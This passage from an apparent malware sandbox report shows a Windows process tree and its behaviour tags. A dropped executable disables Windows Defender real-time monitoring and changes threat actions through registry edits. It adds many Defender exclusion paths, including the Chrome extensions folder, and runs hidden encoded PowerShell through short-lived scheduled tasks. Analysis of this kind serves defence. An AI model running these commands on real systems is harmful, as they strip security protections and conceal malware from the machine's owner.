                                          \??\C:\Windows\system32\conhost.exe "-17899670171581549947-38045067618233776891484213953-11999538561437409039491486231"
                                          1⤵
                                            PID:1320
                                          • C:\Windows\system32\conhost.exe
                                            \??\C:\Windows\system32\conhost.exe "-1438570478-3726709131306144630-1218981026-1644705276-1692499215-18113691742031094512"
                                            1⤵
                                              PID:2640
                                            • C:\Windows\system32\conhost.exe
                                              \??\C:\Windows\system32\conhost.exe "1521710458-1393558928564043908127837722821426675739758009-1809921876345213050"
                                              1⤵
                                                PID:1736
                                              • C:\Windows\system32\taskeng.exe
                                                taskeng.exe {EF2076FA-74F9-4C17-AE25-D79D80C76AA3} S-1-5-18:NT AUTHORITY\System:Service:
                                                1⤵
                                                  PID:2732
                                                  • C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB\LEUXBcbvazrcGrF\tLyiuWA.exe
                                                    C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB\LEUXBcbvazrcGrF\tLyiuWA.exe NE /PkdidT 385121 /S
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Drops file in System32 directory
                                                    • System Location Discovery: System Language Discovery
                                                    • Modifies data under HKEY_USERS
                                                    PID:2776
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                      3⤵
                                                        PID:2204
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                          4⤵
                                                          • Indirect Command Execution
                                                          PID:1044
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                            5⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2264
                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                              6⤵
                                                                PID:2596
                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                            4⤵
                                                            • Indirect Command Execution
                                                            PID:896
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                              5⤵
                                                                PID:836
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                  6⤵
                                                                    PID:1372
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                4⤵
                                                                • Indirect Command Execution
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2288
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                  5⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:776
                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                    6⤵
                                                                      PID:1984
                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                  4⤵
                                                                  • Indirect Command Execution
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1672
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                    5⤵
                                                                      PID:1804
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                        6⤵
                                                                          PID:1348
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                      4⤵
                                                                      • Indirect Command Execution
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1644
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                        5⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1960
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                          6⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1540
                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                            7⤵
                                                                              PID:1032
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /CREATE /TN "ghkONNIyK" /SC once /ST 00:45:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:928
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /run /I /tn "ghkONNIyK"
                                                                      3⤵
                                                                        PID:2940
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /DELETE /F /TN "ghkONNIyK"
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1104
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                        3⤵
                                                                          PID:1964
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                            4⤵
                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:1916
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:1616
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                            4⤵
                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                            PID:1288
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gicyNEtIg" /SC once /ST 00:23:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:1920
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gicyNEtIg"
                                                                          3⤵
                                                                            PID:1028
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gicyNEtIg"
                                                                            3⤵
                                                                              PID:872
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                              3⤵
                                                                              • Indirect Command Execution
                                                                              PID:1700
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                4⤵
                                                                                  PID:2204
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                    5⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Drops file in System32 directory
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2356
                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                      6⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:828
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:3032
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
                                                                                  4⤵
                                                                                  • Windows security bypass
                                                                                  PID:2940
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                  PID:2044
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
                                                                                    4⤵
                                                                                    • Windows security bypass
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:1608
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2304
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
                                                                                    4⤵
                                                                                      PID:2808
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:2900
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2240
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /C copy nul "C:\Windows\Temp\VLvKqTazivYGshTO\PEWycYeM\TjCGwKzdZzrXomsJ.wsf"
                                                                                      3⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:300
                                                                                    • C:\Windows\SysWOW64\wscript.exe
                                                                                      wscript "C:\Windows\Temp\VLvKqTazivYGshTO\PEWycYeM\TjCGwKzdZzrXomsJ.wsf"
                                                                                      3⤵
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:2772
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EKfHLQOzikZzC" /t REG_DWORD /d 0 /reg:32
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        PID:1600
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EKfHLQOzikZzC" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        PID:2700
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR" /t REG_DWORD /d 0 /reg:32
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2112
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        PID:2348
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kVyftiaSU" /t REG_DWORD /d 0 /reg:32
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        PID:2200
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kVyftiaSU" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        PID:1648
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\linOwUtCTeUn" /t REG_DWORD /d 0 /reg:32
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        PID:1712
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\linOwUtCTeUn" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        PID:3064
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vECSWYHhNEBU2" /t REG_DWORD /d 0 /reg:32
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        PID:2256
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vECSWYHhNEBU2" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        PID:1940
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NUEAEvpmbtRdsZVB" /t REG_DWORD /d 0 /reg:32
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        PID:2004
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NUEAEvpmbtRdsZVB" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        PID:2536
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2680
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        PID:1612
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB" /t REG_DWORD /d 0 /reg:32
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:1492
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:1484
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:1320
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        PID:2652
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EKfHLQOzikZzC" /t REG_DWORD /d 0 /reg:32
                                                                                        4⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:352
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EKfHLQOzikZzC" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                          PID:836
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR" /t REG_DWORD /d 0 /reg:32
                                                                                          4⤵
                                                                                            PID:2500
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR" /t REG_DWORD /d 0 /reg:64
                                                                                            4⤵
                                                                                              PID:2660
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kVyftiaSU" /t REG_DWORD /d 0 /reg:32
                                                                                              4⤵
                                                                                                PID:2188
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kVyftiaSU" /t REG_DWORD /d 0 /reg:64
                                                                                                4⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:3028
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\linOwUtCTeUn" /t REG_DWORD /d 0 /reg:32
                                                                                                4⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1624
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\linOwUtCTeUn" /t REG_DWORD /d 0 /reg:64
                                                                                                4⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1776
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vECSWYHhNEBU2" /t REG_DWORD /d 0 /reg:32
                                                                                                4⤵
                                                                                                  PID:1860
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vECSWYHhNEBU2" /t REG_DWORD /d 0 /reg:64
                                                                                                  4⤵
                                                                                                    PID:2356
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NUEAEvpmbtRdsZVB" /t REG_DWORD /d 0 /reg:32
                                                                                                    4⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:1700
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NUEAEvpmbtRdsZVB" /t REG_DWORD /d 0 /reg:64
                                                                                                    4⤵
                                                                                                      PID:2444
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                      4⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:2140
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                      4⤵
                                                                                                        PID:2756
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                          PID:2328
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                            PID:540
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
                                                                                                            4⤵
                                                                                                              PID:2960
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
                                                                                                              4⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:1944
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /CREATE /TN "gsjRODmbv" /SC once /ST 00:50:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                            3⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                            PID:2336
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /run /I /tn "gsjRODmbv"
                                                                                                            3⤵
                                                                                                              PID:1928
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /DELETE /F /TN "gsjRODmbv"
                                                                                                              3⤵
                                                                                                                PID:1808
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                3⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:1956
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                  4⤵
                                                                                                                    PID:1612
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:2276
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
